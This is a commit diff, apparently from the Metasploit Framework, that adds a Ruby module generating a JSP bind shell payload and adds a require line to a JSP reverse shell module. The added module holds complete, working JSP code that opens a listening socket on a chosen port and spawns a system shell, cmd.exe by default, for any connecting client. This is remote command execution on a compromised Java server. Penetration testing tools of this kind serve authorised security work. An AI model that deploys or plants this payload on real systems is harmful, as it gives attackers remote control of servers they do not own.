Commit a jsp bind shell payload (and add a missing require to the jsp reverse shell).
git-svn-id: file:///home/svn/framework3/trunk@7220 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a3c9c5d669
commit
995745d642
|
@ -0,0 +1,108 @@
|
||||||
|
##
|
||||||
|
# $Id$
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# Thin file in part of the Metasploit Framework and may be subject to
|
||||||
|
# redintribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/bind_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Java JSP Command Shell, Bind TCP Inline',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Listen for a connection and spawn a command shell',
|
||||||
|
'Author' => [ 'sf' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => [ 'win', 'osx', 'linux', 'unix', 'solaris' ],
|
||||||
|
'Arch' => ARCH_JAVA,
|
||||||
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Offsets' => { },
|
||||||
|
'Payload' => ''
|
||||||
|
}
|
||||||
|
))
|
||||||
|
register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
def generate
|
||||||
|
# Modified from: http://www.security.org.sg/code/jspreverse.html
|
||||||
|
jsp = %q{
|
||||||
|
<%@page import="java.lang.*"%>
|
||||||
|
<%@page import="java.util.*"%>
|
||||||
|
<%@page import="java.io.*"%>
|
||||||
|
<%@page import="java.net.*"%>
|
||||||
|
|
||||||
|
<%
|
||||||
|
class StreamConnector extends Thread
|
||||||
|
{
|
||||||
|
InputStream is;
|
||||||
|
OutputStream os;
|
||||||
|
|
||||||
|
StreamConnector( InputStream is, OutputStream os )
|
||||||
|
{
|
||||||
|
this.is = is;
|
||||||
|
this.os = os;
|
||||||
|
}
|
||||||
|
|
||||||
|
public void run()
|
||||||
|
{
|
||||||
|
BufferedReader in = null;
|
||||||
|
BufferedWriter out = null;
|
||||||
|
try
|
||||||
|
{
|
||||||
|
in = new BufferedReader( new InputStreamReader( this.is ) );
|
||||||
|
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
|
||||||
|
char buffer[] = new char[8192];
|
||||||
|
int length;
|
||||||
|
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
|
||||||
|
{
|
||||||
|
out.write( buffer, 0, length );
|
||||||
|
out.flush();
|
||||||
|
}
|
||||||
|
} catch( Exception e ){}
|
||||||
|
try
|
||||||
|
{
|
||||||
|
if( in != null )
|
||||||
|
in.close();
|
||||||
|
if( out != null )
|
||||||
|
out.close();
|
||||||
|
} catch( Exception e ){}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
try
|
||||||
|
{
|
||||||
|
ServerSocket server_socket = new ServerSocket( LPORT );
|
||||||
|
Socket client_socket = server_socket.accept();
|
||||||
|
server_socket.close();
|
||||||
|
Process process = Runtime.getRuntime().exec( "SHELL" );
|
||||||
|
( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
|
||||||
|
( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
|
||||||
|
} catch( Exception e ) {}
|
||||||
|
%>
|
||||||
|
}
|
||||||
|
|
||||||
|
jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
|
||||||
|
|
||||||
|
jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
|
||||||
|
|
||||||
|
return super + jsp
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -12,6 +12,7 @@
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_tcp'
|
require 'msf/core/handler/reverse_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
|
Loading…
Reference in New Issue